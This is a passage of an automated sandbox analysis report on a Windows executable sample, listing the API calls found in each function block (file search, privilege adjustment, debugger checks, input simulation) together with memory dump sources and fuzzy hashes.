                                                          • Opcode Fuzzy Hash: 0d25f3ff296d37f43d5f112b9a887fc3db645fc6efadf1b617b9a1e9e79a6927
                                                          • Instruction Fuzzy Hash: 73323574A006059FCB28DF59C481A6AB7F0FF48710B55C56EE99ADB3A1EB70EA41CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00195CC1
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00195D17
                                                          • FindClose.KERNEL32(?), ref: 00195D5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 3a161e70d9b8936106f35ba0ab273e89d26646817fbb679a76a8876eda172cc9
                                                          • Instruction ID: a362da26d90981949ad2070108e8f3f26cd44a336d458b33a653406d647dbd3c
                                                          • Opcode Fuzzy Hash: 3a161e70d9b8936106f35ba0ab273e89d26646817fbb679a76a8876eda172cc9
                                                          • Instruction Fuzzy Hash: CF519734604A019FCB18CF68D498E9AB7E5FF09314F14855EE99A8B3A2CB30FD44CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 0015271A
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00152724
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00152731
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 392857bd5ca7e7dd0a91c2dbbdb20f4839c45b460ede267a00a58f2cd147def1
                                                          • Instruction ID: f397925927d94b7ab617e18341f97f55f857218b74c087237832fa348e42f402
                                                          • Opcode Fuzzy Hash: 392857bd5ca7e7dd0a91c2dbbdb20f4839c45b460ede267a00a58f2cd147def1
                                                          • Instruction Fuzzy Hash: 7731B5759112289BCB21DF65DC89B9DB7B8BF18310F5042EAE81CA7261E7309F858F85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 001951DA
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00195238
                                                          • SetErrorMode.KERNEL32(00000000), ref: 001952A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: dbc4cbe5bb4a06644fa2b53f8ae70fab88f18df061d8e2d2cdb45ff7bfe236c2
                                                          • Instruction ID: 815132e643078304f1075c2562d507da3b25f7925b57d82c89f941116037c83b
                                                          • Opcode Fuzzy Hash: dbc4cbe5bb4a06644fa2b53f8ae70fab88f18df061d8e2d2cdb45ff7bfe236c2
                                                          • Instruction Fuzzy Hash: CE314F75A00518DFDB00DF58D884EADBBF5FF49314F088099E905AB3A2DB31E855CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0013FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00140668
                                                            • Part of subcall function 0013FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00140685
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
                                                          • GetLastError.KERNEL32 ref: 0018174A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                          • String ID:
                                                          • API String ID: 577356006-0
                                                          • Opcode ID: 14f59b362164870bc0fe37c0a4c3f2e5d05b86f30372f463859f73b42939aecb
                                                          • Instruction ID: 4a7a3253c4f1d31ce5000f3d2b71d800113a2d00a819125171f4ff2fc8ee7a30
                                                          • Opcode Fuzzy Hash: 14f59b362164870bc0fe37c0a4c3f2e5d05b86f30372f463859f73b42939aecb
                                                          • Instruction Fuzzy Hash: DD118FB2804204BFD718AF54DCC6D6BB7BDEB44714B20852EF05656641EB70BD428B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0018D608
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0018D645
                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0018D650
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: 7e81cb8f164363459a962e05798c6dc1ede7116b83ca128798bdd6c788f954dd
                                                          • Instruction ID: e5fc82969249dba9dd82f77090a8ea5a1c48332e757b71054a05e50dbc936541
                                                          • Opcode Fuzzy Hash: 7e81cb8f164363459a962e05798c6dc1ede7116b83ca128798bdd6c788f954dd
                                                          • Instruction Fuzzy Hash: D7113C75E05228BBDB109F99AC45FAFBBBCEB45B50F108165F904E7290D7704A058BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0018168C
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001816A1
                                                          • FreeSid.ADVAPI32(?), ref: 001816B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 92ce790589831309ea4204981b9e28560b790c70c1aa7bd6bc36d959d1912db1
                                                          • Instruction ID: bf2bc4cc9cb81b1205d73383998e93cc6872196c53a2a7017b915853cfd065da
                                                          • Opcode Fuzzy Hash: 92ce790589831309ea4204981b9e28560b790c70c1aa7bd6bc36d959d1912db1
                                                          • Instruction Fuzzy Hash: DEF0F475950309FBDB00EFE49C89AAEBBBCFB08604F504565F501E2181E774AA448BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(001528E9,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000,?,001528E9), ref: 00144D09
                                                          • TerminateProcess.KERNEL32(00000000,?,00144CBE,001528E9,001E88B8,0000000C,00144E15,001528E9,00000002,00000000,?,001528E9), ref: 00144D10
                                                          • ExitProcess.KERNEL32 ref: 00144D22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 0f873a0014678214bd9e15702efd001de2e42ba7ce93d948ae4ac31adfcac7c9
                                                          • Instruction ID: 43b5ed85a33bd6ec6ae69aed4394d564b53066c380a18414e738aae84f8ad8ad
                                                          • Opcode Fuzzy Hash: 0f873a0014678214bd9e15702efd001de2e42ba7ce93d948ae4ac31adfcac7c9
                                                          • Instruction Fuzzy Hash: 6BE0B631400148ABCF11AF94DD09A583BA9FB61781B504118FC199B532CB35DE82CA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0017D28C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID: X64
                                                          • API String ID: 2645101109-893830106
                                                          • Opcode ID: 8083bb1872d50a071596c1e30f534ffc844add43892cfe2b308859fdeafdb166
                                                          • Instruction ID: 58307c09aa05782779e1b1cda2c68a03a2ac4a041f45fb5ecdf200f93136d291
                                                          • Opcode Fuzzy Hash: 8083bb1872d50a071596c1e30f534ffc844add43892cfe2b308859fdeafdb166
                                                          • Instruction Fuzzy Hash: 45D0CAB880112DEBCB98DBA0EC88DDEB3BCBB04305F104292F50AA2000DB3096898F20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                          • Instruction ID: 3846bd230a83d64b55642a663d285274888a038264f546b717da61cc04ebd6d5
                                                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                          • Instruction Fuzzy Hash: E9023C71E012199FDF54CFA9C8806AEFBF1EF98314F25816AD819E7390D731AA418BC0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00196918
                                                          • FindClose.KERNEL32(00000000), ref: 00196961
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: ad60862d6533aa4714358047567f18915e5fdfef97ed4ca59de9f31ca909db72
                                                          • Instruction ID: 525b821c35d1e7f83aa7e890bbe1516b8d34a51029f1e79b6f497aa0e96e80e4
                                                          • Opcode Fuzzy Hash: ad60862d6533aa4714358047567f18915e5fdfef97ed4ca59de9f31ca909db72
                                                          • Instruction Fuzzy Hash: AA1190316042109FCB10DF29D484A1ABBE5FF89328F14C699E4698F6A2C730EC45CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001A4891,?,?,00000035,?), ref: 001937E4
                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001A4891,?,?,00000035,?), ref: 001937F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 84f6c2b8c620aa5281738201ea3085f2c48c87997b464b023700da616784b71d
                                                          • Instruction ID: cd230ec8e77a8dc2450f37d476c7930057f794b9d83113f89f0c960730cbc5df
                                                          • Opcode Fuzzy Hash: 84f6c2b8c620aa5281738201ea3085f2c48c87997b464b023700da616784b71d
                                                          • Instruction Fuzzy Hash: ECF0E5B06042282AEB2017A69C4DFEB3AAEEFC4761F000265F509D2291DB609944C6F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0018B25D
                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0018B270
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 163e130068960287cadb5ac97a0a7111e2f33c0fa831bf7107b78e17b0fd7bfd
                                                          • Instruction ID: cad6b3454081e8d8c44b810cc3f891b73ea0b8aeee5bbe3df326446f66a6abc0
                                                          • Opcode Fuzzy Hash: 163e130068960287cadb5ac97a0a7111e2f33c0fa831bf7107b78e17b0fd7bfd
                                                          • Instruction Fuzzy Hash: 16F01D7190428EABDB159FA4C805BEE7BB4FF04305F008019F955A5191C77996519F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001811FC), ref: 001810D4
                                                          • CloseHandle.KERNEL32(?,?,001811FC), ref: 001810E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 92051503c3cc2d4036e47459178a0741623ea47ad5aa3023a8f2726fddc11cd6
                                                          • Instruction ID: 61b2b7762770d4ea3e4452b9f15eeba87594be96debea47abf7fb8cf834fae7a
                                                          • Opcode Fuzzy Hash: 92051503c3cc2d4036e47459178a0741623ea47ad5aa3023a8f2726fddc11cd6
                                                          • Instruction Fuzzy Hash: 93E0BF72418610AFE7252B51FC09E7777E9EB04310F14892DF5A5804B5DB626CD1DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Variable is not of type 'Object'., xrefs: 00170C40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Variable is not of type 'Object'.
                                                          • API String ID: 0-1840281001
                                                          • Opcode ID: af4b6761dc5c3bdcbece67c54031387ae47488ce8e9c60b4246232965f7a00d4
                                                          • Instruction ID: 6cefd2a10dab6e803625ce2ea303896b610e2c12ad784e8c8071a88d22a040d7
                                                          • Opcode Fuzzy Hash: af4b6761dc5c3bdcbece67c54031387ae47488ce8e9c60b4246232965f7a00d4
                                                          • Instruction Fuzzy Hash: 4C32B170900328DFCF19DF94E981AEDB7B5FF19304F108059E90AAB292DB75AE55CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00156766,?,?,00000008,?,?,0015FEFE,00000000), ref: 00156998
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: 8aa73c97dd24231093cf8f0760e4c2e2f67f5fe124fa704050b27b0f0d6ac94e
                                                          • Instruction ID: 6bd881c4721d3dc923cce31f9bb39be517af0e2ac97cc57638b1ec1cae1a9e14
                                                          • Opcode Fuzzy Hash: 8aa73c97dd24231093cf8f0760e4c2e2f67f5fe124fa704050b27b0f0d6ac94e
                                                          • Instruction Fuzzy Hash: 93B16D31610608DFD719CF28C486B657BE0FF45366F658658ECA9CF2A2C335D999CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 8f4ce0bd991bd10298d117874f8e0fabf10ff6abfeaded1d01b1e82c1cb0712a
                                                          • Instruction ID: fb462d34d0efbf62e0b9da2e664b2ec2e0aeb1e776116bf3b3fd4ede14a550a8
                                                          • Opcode Fuzzy Hash: 8f4ce0bd991bd10298d117874f8e0fabf10ff6abfeaded1d01b1e82c1cb0712a
                                                          • Instruction Fuzzy Hash: 63125E71E042299BCB14CF58C881BEEB7F5FF48710F15819AE949EB255EB349E81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 0019EABD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 64cb8b9975b0676b3f5411ad1bab0a491e1463939831f16b78caa72fdbd166a6
                                                          • Instruction ID: 5f2f7d4659029419db18c955daca9d8e3b8e7c7b20e7b64dcf76816c0cead671
                                                          • Opcode Fuzzy Hash: 64cb8b9975b0676b3f5411ad1bab0a491e1463939831f16b78caa72fdbd166a6
                                                          • Instruction Fuzzy Hash: 72E04F312002149FDB10EF59E844E9AF7E9AFA8760F048426FD49CB361DB70E8418BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001403EE), ref: 001409DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
